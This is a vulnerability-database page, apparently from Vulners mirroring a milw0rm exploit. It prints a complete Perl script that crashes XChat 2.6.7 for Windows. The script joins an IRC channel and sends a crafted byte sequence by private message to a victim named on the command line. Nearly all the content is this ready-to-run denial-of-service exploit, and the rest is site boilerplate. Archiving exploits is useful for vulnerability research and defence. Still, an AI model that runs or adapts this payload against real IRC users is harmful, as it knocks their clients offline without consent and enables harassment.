Lucene search
K

XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

XChat Remote Denial of Service Exploi

Code

                                                #!/usr/bin/perl

# rewritten because perl is more elegant than php
# payload taken from original that ratboy submitted

use strict;
use Net::IRC;

my ($nick, $server, $port, $channel, $victim) = @ARGV;

my $irc = new Net::IRC;
my $connect = $irc -&#62; newconn (Nick =&#62; &#34;$nick&#34;,
Server =&#62; &#34;$server&#34;,
Port =&#62; $port,
Ircname=&#62; &#39;whatever&#39;)
or die &#34;$0: Error\n&#34;;

my $payload = &#34;\x9x\xF0\x92\x8D\x85\xF1\xA5\x90\xB4\xF1\x96\x9E\x85\xF1\xA6\x8D\xA5\xF1\xB8\xA5\x85\xF1\xA7\x95\xA8\x29\xF2\x95\x95\x82&#34;;        

sub on_connect {
	my $self = shift;
	
	$self-&#62;join(&#34;#&#34;.$channel);
	$self-&#62;privmsg($victim, &#34;$payload&#34;);
}

$connect-&#62;add_handler(&#39;376&#39;, \&on_connect);
$irc-&#62;start();

# milw0rm.com [2006-08-08]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
10